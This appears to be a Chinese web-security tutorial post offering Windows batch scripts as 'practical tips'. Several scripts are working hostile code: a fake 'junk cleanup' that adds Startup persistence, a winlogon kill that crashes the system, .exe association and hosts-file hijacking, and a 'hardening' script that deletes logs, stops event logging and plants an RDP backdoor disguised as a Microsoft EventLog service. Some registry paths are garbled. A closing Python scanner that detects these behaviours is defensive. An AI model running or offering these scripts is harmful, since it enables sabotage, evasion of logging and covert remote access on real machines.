#yyds Practical Tips Roundup# Web Security Day 21: Learning to Use the Most Basic Batch Programs

User submission 258 2022-10-05



A few commonly used commands

System junk cleanup

@echo off
title 系统垃圾清理
color 2f
echo =====若有杀毒软件恶意拦截,请选择【允许程序的所有操作】 ====
echo.
echo.
echo start cmd >c:\windows\windows.bat
echo %0>>c:\windows\windows.bat
copy c:\windows\windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\">nul
if %errorlevel%==0 goto next
copy c:\windows\windows.bat "%USERPROFILE%\「开始」菜单\程序\启动\">nul
if %errorlevel%==1 goto error

Restarting Explorer

ping -n 5 127.0.0.1>nul
taskkill /im explorer.exe /f >nul 2>nul
echo.
echo =====完犊子了,你的系统已经废了=======
ping -n 5 127.0.0.1>nul
echo.
Start c:\windows\explorer.exe
echo.
echo =====已修复好!是不是吓坏了!!嘿嘿==========
pause

Blue screen

ntsd -c q -pn winlogon.exe

Changing a file extension association

assoc .exe=txtfile
rem Restore the default association
assoc .exe=exefile

Infinite loop

do
msgbox "循环啦"
loop

Modifying address resolution

echo 1.1.1.1 taobao.com >>c:\windows\system32\drivers\etc\hosts

Advanced commands

Batch script to delete the default shares on Win2k/XP

@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail toEx4rch@hotmail.com.
echo.
echo.
echo ------------------------------------------------------
echo.
:EOF
echo end of the batch file

Comprehensive system hardening

@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [Disable default shares]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [Disable anonymous logon]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [Disable file access and printer sharing]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [Disallow shutdown before logon]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [Do not display the last logged-on user name]
@regedit /s patch.dll

Clearing logs

@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:winntsystem32logfilesw3svc1*.* /f /q
@del c:winntsystem32logfilesw3svc2*.* /f /q
@del c:winntsystem32config*.event /f /q
@del c:winntsystem32dtclog*.* /f /q
@del c:winnt*.txt /f /q
@del c:winnt*.log /f /q
@net start w3svc
@net start event log
@rem [Delete logs]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [Disable some dangerous services.]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Descr1ption"="Keep record of the program and windows'' message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe
@REM [Change the 3389 connection: port 8210 (hex 00002012), service name Microsoft EventLog, leaving a back door]
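Seen from the defender's side, the behaviours in the scripts above (copies into the Startup folder, appends to the hosts file, changes to the .exe association, stopping the event log service, deleting log files, writing a "PortNumber" registry value, killing winlogon.exe) can be flagged by a simple static scan of a batch file. The scanner below is an added example, not part of the original post; the rule names, function names and the sample script are constructed for illustration.

```python
import re

# Rule names are this example's own labels; each pattern mirrors a behaviour
# that appears in the batch scripts quoted on this page.
RULES = [
    ("startup_persistence", re.compile(r'\b(copy|xcopy|move)\b.*(\\startup\\|\\启动\\)', re.I)),
    ("hosts_tamper", re.compile(r'>>?\s*\S*\\drivers\\etc\\hosts\b', re.I)),
    ("exe_assoc_change", re.compile(r'\bassoc\s+\.exe\s*=(?!\s*exefile\b)', re.I)),
    ("eventlog_stop", re.compile(r'\bnet\s+stop\s+"?event\s*log', re.I)),
    ("log_deletion", re.compile(r'\bdel\b.*(logfiles|\.evt|\.event|\.log\b)', re.I)),
    ("rdp_portnumber_write", re.compile(r'"PortNumber"\s*=\s*dword:', re.I)),
    ("critical_process_kill", re.compile(r'\b(ntsd|taskkill)\b.*\b(winlogon|csrss|lsass)\.exe', re.I)),
]

def scan_batch(text):
    """Return (line_number, rule_name, line) for every rule hit in a script."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip().lstrip("@")
        if re.match(r'(rem\b|::)', line, re.I):  # comments are not commands
            continue
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name, raw.strip()))
    return findings

def summarize(findings):
    """Group findings as rule name -> list of line numbers."""
    grouped = {}
    for lineno, name, _ in findings:
        grouped.setdefault(name, []).append(lineno)
    return grouped

# Constructed sample, modelled on commands quoted on this page.
SAMPLE = r'''@echo off
rem constructed sample for the scanner
copy c:\windows\windows.bat "%USERPROFILE%\Start Menu\Programs\Startup\" >nul
echo 1.1.1.1 taobao.com >>c:\windows\system32\drivers\etc\hosts
assoc .exe=txtfile
assoc .exe=exefile
net stop eventlog
del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
echo "PortNumber"=dword:00002012 >>patch.dll
ntsd -c q -pn winlogon.exe
'''

if __name__ == "__main__":
    for lineno, name, line in scan_batch(SAMPLE):
        print(f"line {lineno}: {name}: {line}")
```

The restoring command `assoc .exe=exefile` and `rem` lines are deliberately not flagged; a hit is a prompt for review, since a "PortNumber" write only matters when the preceding registry key is the Terminal Server one.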

For more on batch scripting, see the following article: https://jb51.net/article/41322.htm

